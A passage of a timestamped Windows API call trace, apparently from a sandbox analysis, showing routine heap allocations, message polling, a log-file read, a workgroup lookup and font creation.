(HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96d00 [0268.429] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdff4a0 [0268.429] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96d00 | out: hHeap=0xb80000) returned 1 [0268.429] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff4a0 | out: hHeap=0xb80000) returned 1 [0268.429] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96ce8 | out: hHeap=0xb80000) returned 1 [0268.429] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96ce8 [0268.429] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96d00 [0268.429] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96d18 [0268.429] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdff4a0 [0268.429] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96d18 | out: hHeap=0xb80000) returned 1 [0268.429] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff4a0 | out: hHeap=0xb80000) returned 1 [0268.429] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96d00 | out: hHeap=0xb80000) returned 1 [0268.430] FreeLibrary (hLibModule=0x76e00000) returned 1 [0268.430] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff450 | out: hHeap=0xb80000) returned 1 [0268.430] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff460 | out: hHeap=0xb80000) returned 1 [0268.430] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff470 | out: hHeap=0xb80000) returned 1 [0268.430] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff480 | out: hHeap=0xb80000) returned 1 [0268.430] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddf8c8 | out: hHeap=0xb80000) returned 1 [0268.430] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96c70 | out: hHeap=0xb80000) returned 1 [0268.430] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff430 | out: hHeap=0xb80000) returned 1 [0268.430] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96ad8 | out: hHeap=0xb80000) returned 1 [0268.430] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96ac0 | out: hHeap=0xb80000) returned 1 [0268.430] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96b08 | out: hHeap=0xb80000) returned 1 [0268.430] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96af0 | out: hHeap=0xb80000) returned 1 [0268.430] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96b38 | out: hHeap=0xb80000) returned 1 [0268.430] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96b20 | out: hHeap=0xb80000) returned 1 [0268.430] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96b68 | out: hHeap=0xb80000) returned 1 [0268.430] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96b50 | out: hHeap=0xb80000) returned 1 [0268.430] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96b80 | out: hHeap=0xb80000) returned 1 [0268.430] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96bb0 | out: hHeap=0xb80000) returned 1 [0268.430] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96b98 | out: hHeap=0xb80000) returned 1 [0268.430] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96bc8 | out: hHeap=0xb80000) returned 1 [0268.430] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96bf8 | out: hHeap=0xb80000) returned 1 [0268.430] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96be0 | out: hHeap=0xb80000) returned 1 [0268.430] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96c10 | out: hHeap=0xb80000) returned 1 [0268.430] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96c40 | out: hHeap=0xb80000) returned 1 [0268.430] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96c28 | out: hHeap=0xb80000) returned 1 [0268.431] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96c58 | out: hHeap=0xb80000) returned 1 [0268.431] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xda3e88 | out: hHeap=0xb80000) returned 1 [0268.431] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff420 | out: hHeap=0xb80000) returned 1 [0268.431] PeekMessageW (in: lpMsg=0x75f45c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f45c) returned 0 [0268.431] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff420 [0268.431] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20a) returned 0xbc7618 [0268.431] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdff430 [0268.431] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc7618 | out: hHeap=0xb80000) returned 1 [0268.431] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff430 | out: hHeap=0xb80000) returned 1 [0268.431] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff420 | out: hHeap=0xb80000) returned 1 [0268.431] PeekMessageW (in: lpMsg=0x75f45c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f45c) returned 0 [0268.431] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff420 [0268.431] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff430 [0268.431] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x18) returned 0xde2cf8 [0268.431] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff480 [0268.431] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x18) returned 0xde2d18 [0268.431] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff480 | out: hHeap=0xb80000) returned 1 [0268.431] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xde2d18 | out: hHeap=0xb80000) returned 1 [0268.431] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xde2cf8 | out: hHeap=0xb80000) returned 1 [0268.431] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff430 | out: hHeap=0xb80000) returned 1 [0268.431] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff420 | out: hHeap=0xb80000) returned 1 [0268.431] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddf8c8 [0268.431] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd96c58 [0268.431] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd96c28 [0268.432] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96c40 [0268.432] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd96c10 [0268.432] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd96be0 [0268.432] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96bf8 [0268.432] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd96bc8 [0268.432] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd96b98 [0268.432] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff420 [0268.432] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff430 [0268.432] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff430 | out: hHeap=0xb80000) returned 1 [0268.432] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff420 | out: hHeap=0xb80000) returned 1 [0268.433] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96c58 | out: hHeap=0xb80000) returned 1 [0268.433] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96c40 | out: hHeap=0xb80000) returned 1 [0268.433] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96c28 | out: hHeap=0xb80000) returned 1 [0268.433] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96c10 | out: hHeap=0xb80000) returned 1 [0268.433] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96bf8 | out: hHeap=0xb80000) returned 1 [0268.433] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96be0 | out: hHeap=0xb80000) returned 1 [0268.433] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96bc8 | out: hHeap=0xb80000) returned 1 [0268.433] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96b98 | out: hHeap=0xb80000) returned 1 [0268.433] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddf8c8 | out: hHeap=0xb80000) returned 1 [0268.433] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xda3e40 | out: hHeap=0xb80000) returned 1 [0268.433] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd968e0 | out: hHeap=0xb80000) returned 1 [0268.433] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd968f8 | out: hHeap=0xb80000) returned 1 [0268.433] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff390 | out: hHeap=0xb80000) returned 1 [0268.433] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddf6e8 | out: hHeap=0xb80000) returned 1 [0268.433] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96ca0 | out: hHeap=0xb80000) returned 1 [0268.433] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96c88 | out: hHeap=0xb80000) returned 1 [0268.433] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96cb8 | out: hHeap=0xb80000) returned 1 [0268.433] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96cd0 | out: hHeap=0xb80000) returned 1 [0268.434] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96ce8 | out: hHeap=0xb80000) returned 1 [0268.434] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xca78f8 | out: hHeap=0xb80000) returned 1 [0268.434] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc73f0 | out: hHeap=0xb80000) returned 1 [0268.434] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff4b0 | out: hHeap=0xb80000) returned 1 [0268.434] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96aa8 | out: hHeap=0xb80000) returned 1 [0268.434] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96a90 | out: hHeap=0xb80000) returned 1 [0268.434] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff410 | out: hHeap=0xb80000) returned 1 [0268.434] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddf8a0 | out: hHeap=0xb80000) returned 1 [0268.434] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96898 | out: hHeap=0xb80000) returned 1 [0268.434] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd968c8 | out: hHeap=0xb80000) returned 1 [0268.434] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff3a0 | out: hHeap=0xb80000) returned 1 [0268.434] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddf710 | out: hHeap=0xb80000) returned 1 [0268.434] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96a78 | out: hHeap=0xb80000) returned 1 [0268.434] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96a60 | out: hHeap=0xb80000) returned 1 [0268.434] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddf878 | out: hHeap=0xb80000) returned 1 [0268.434] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff400 | out: hHeap=0xb80000) returned 1 [0268.434] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddf850 | out: hHeap=0xb80000) returned 1 [0268.434] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96a18 | out: hHeap=0xb80000) returned 1 [0268.434] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96a00 | out: hHeap=0xb80000) returned 1 [0268.434] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddf7d8 | out: hHeap=0xb80000) returned 1 [0268.434] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff3e0 | out: hHeap=0xb80000) returned 1 [0268.434] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddf7b0 | out: hHeap=0xb80000) returned 1 [0268.434] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96970 | out: hHeap=0xb80000) returned 1 [0268.434] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd968b0 | out: hHeap=0xb80000) returned 1 [0268.434] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff3b0 | out: hHeap=0xb80000) returned 1 [0268.434] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddf738 | out: hHeap=0xb80000) returned 1 [0268.435] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96a48 | out: hHeap=0xb80000) returned 1 [0268.435] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96a30 | out: hHeap=0xb80000) returned 1 [0268.435] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddf828 | out: hHeap=0xb80000) returned 1 [0268.435] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff3f0 | out: hHeap=0xb80000) returned 1 [0268.435] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddf800 | out: hHeap=0xb80000) returned 1 [0268.435] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd969a0 | out: hHeap=0xb80000) returned 1 [0268.435] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96988 | out: hHeap=0xb80000) returned 1 [0268.435] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff3c0 | out: hHeap=0xb80000) returned 1 [0268.435] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddf760 | out: hHeap=0xb80000) returned 1 [0268.435] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd969d0 | out: hHeap=0xb80000) returned 1 [0268.435] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd969b8 | out: hHeap=0xb80000) returned 1 [0268.435] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff3d0 | out: hHeap=0xb80000) returned 1 [0268.435] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddf788 | out: hHeap=0xb80000) returned 1 [0268.435] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96928 | out: hHeap=0xb80000) returned 1 [0268.435] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd969e8 | out: hHeap=0xb80000) returned 1 [0268.435] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff360 | out: hHeap=0xb80000) returned 1 [0268.435] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff370 | out: hHeap=0xb80000) returned 1 [0268.435] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff380 | out: hHeap=0xb80000) returned 1 [0268.435] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddf698 | out: hHeap=0xb80000) returned 1 [0268.435] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96958 | out: hHeap=0xb80000) returned 1 [0268.435] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96940 | out: hHeap=0xb80000) returned 1 [0268.435] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96910 | out: hHeap=0xb80000) returned 1 [0268.435] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddf6c0 | out: hHeap=0xb80000) returned 1 [0268.435] PeekMessageW (in: lpMsg=0x75f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f6b4) returned 0 [0268.435] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xda3df8 | out: hHeap=0xb80000) returned 1 [0268.435] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96850 | out: hHeap=0xb80000) returned 1 [0268.436] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd967f0 | out: hHeap=0xb80000) returned 1 [0268.436] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff340 | out: hHeap=0xb80000) returned 1 [0268.436] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddf648 | out: hHeap=0xb80000) returned 1 [0268.436] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96880 | out: hHeap=0xb80000) returned 1 [0268.436] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96868 | out: hHeap=0xb80000) returned 1 [0268.436] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff350 | out: hHeap=0xb80000) returned 1 [0268.436] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddf670 | out: hHeap=0xb80000) returned 1 [0268.436] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd965c8 | out: hHeap=0xb80000) returned 1 [0268.436] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff2d0 | out: hHeap=0xb80000) returned 1 [0268.436] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff330 | out: hHeap=0xb80000) returned 1 [0268.436] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddf5f8 | out: hHeap=0xb80000) returned 1 [0268.436] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd965e0 | out: hHeap=0xb80000) returned 1 [0268.436] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96610 | out: hHeap=0xb80000) returned 1 [0268.436] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddf620 | out: hHeap=0xb80000) returned 1 [0268.436] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.436] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddf620 [0268.436] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96610 [0268.436] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff330 [0268.436] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff2d0 [0268.436] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff2d0 | out: hHeap=0xb80000) returned 1 [0268.436] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff330 | out: hHeap=0xb80000) returned 1 [0268.436] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd965e0 [0268.436] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff330 [0268.436] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff330 | out: hHeap=0xb80000) returned 1 [0268.436] CreateSolidBrush (color=0x0) returned 0x28100725 [0268.437] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd965c8 [0268.437] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd96868 [0268.437] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96610 | out: hHeap=0xb80000) returned 1 [0268.437] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd965e0 | out: hHeap=0xb80000) returned 1 [0268.437] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddf620 | out: hHeap=0xb80000) returned 1 [0268.437] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.437] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddf620 [0268.437] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd965e0 [0268.437] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff330 [0268.437] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff2d0 [0268.437] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff2d0 | out: hHeap=0xb80000) returned 1 [0268.437] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff330 | out: hHeap=0xb80000) returned 1 [0268.437] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96610 [0268.437] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff330 [0268.437] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff330 | out: hHeap=0xb80000) returned 1 [0268.437] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd965e0 | out: hHeap=0xb80000) returned 1 [0268.437] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96610 | out: hHeap=0xb80000) returned 1 [0268.437] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddf620 | out: hHeap=0xb80000) returned 1 [0268.437] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.437] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff330 [0268.437] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddf620 [0268.437] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96610 [0268.437] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff2d0 [0268.437] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd965e0 [0268.438] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff350 [0268.438] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x18) returned 0xca78f8 [0268.438] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96880 [0268.438] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdff340 [0268.438] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x40) returned 0xda3df8 [0268.438] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96880 | out: hHeap=0xb80000) returned 1 [0268.438] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xca78f8 | out: hHeap=0xb80000) returned 1 [0268.438] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff350 | out: hHeap=0xb80000) returned 1 [0268.438] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff2d0 | out: hHeap=0xb80000) returned 1 [0268.438] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96880 [0268.438] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd967f0 [0268.438] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdff2d0 [0268.438] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x38) returned 0xdd5fd8 [0268.438] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10000) returned 0xe0dce0 [0268.439] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96850 [0268.439] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdff350 [0268.439] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5fc [0268.440] SetFilePointerEx (in: hFile=0x5fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0268.440] SetFilePointerEx (in: hFile=0x5fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x75f4e4 | out: lpNewFilePointer=0x0) returned 1 [0268.440] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdff380 [0268.460] SendMessageW (hWnd=0x60168, Msg=0xb1, wParam=0xf4240, lParam=0xf423f) returned 0x1 [0268.460] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96940 | out: hHeap=0xb80000) returned 1 [0268.460] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff340 | out: hHeap=0xb80000) returned 1 [0268.460] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96880 | out: hHeap=0xb80000) returned 1 [0268.460] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe25d20 | out: hHeap=0xb80000) returned 1 [0268.460] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff370 | out: hHeap=0xb80000) returned 1 [0268.460] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96910 | out: hHeap=0xb80000) returned 1 [0268.460] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd967f0 | out: hHeap=0xb80000) returned 1 [0268.460] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddf5f8 | out: hHeap=0xb80000) returned 1 [0268.460] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.468] NetGetJoinInformation (in: lpServer="", lpNameBuffer=0x75e958, BufferType=0x75e970 | out: lpNameBuffer=0x75e958*="WORKGROUP", BufferType=0x75e970) returned 0x0 [0268.491] NetApiBufferSize (in: Buffer=0xdabb50, ByteCount=0x75e308 | out: ByteCount=0x75e308) returned 0x0 [0268.505] CreateFontW (cHeight=-30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=800, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x1, iOutPrecision=0x4, iClipPrecision=0x0, iQuality=0x2, iPitchAndFamily=0x0, pszFaceName="Calibri") returned 0xb40a01d2 [0268.505] SendMessageW (hWnd=0x6016a, Msg=0x30, wParam=0xb40a01d2, lParam=0x1) returned 0x0 [0268.505] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9b260 | out: hHeap=0xb80000) returned 1 [0268.505] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff3c0 | out: hHeap=0xb80000) returned 1 [0268.505] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96a00 | out: hHeap=0xb80000) returned 1 [0268.515] NetGetJoinInformation (in: lpServer="", lpNameBuffer=0x75e958, BufferType=0x75e970 | out: lpNameBuffer=0x75e958*="WORKGROUP", BufferType=0x75e970) returned 0x0 [0268.518] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffea0 [0268.518] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x214) returned 0xbc7618 [0268.518] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 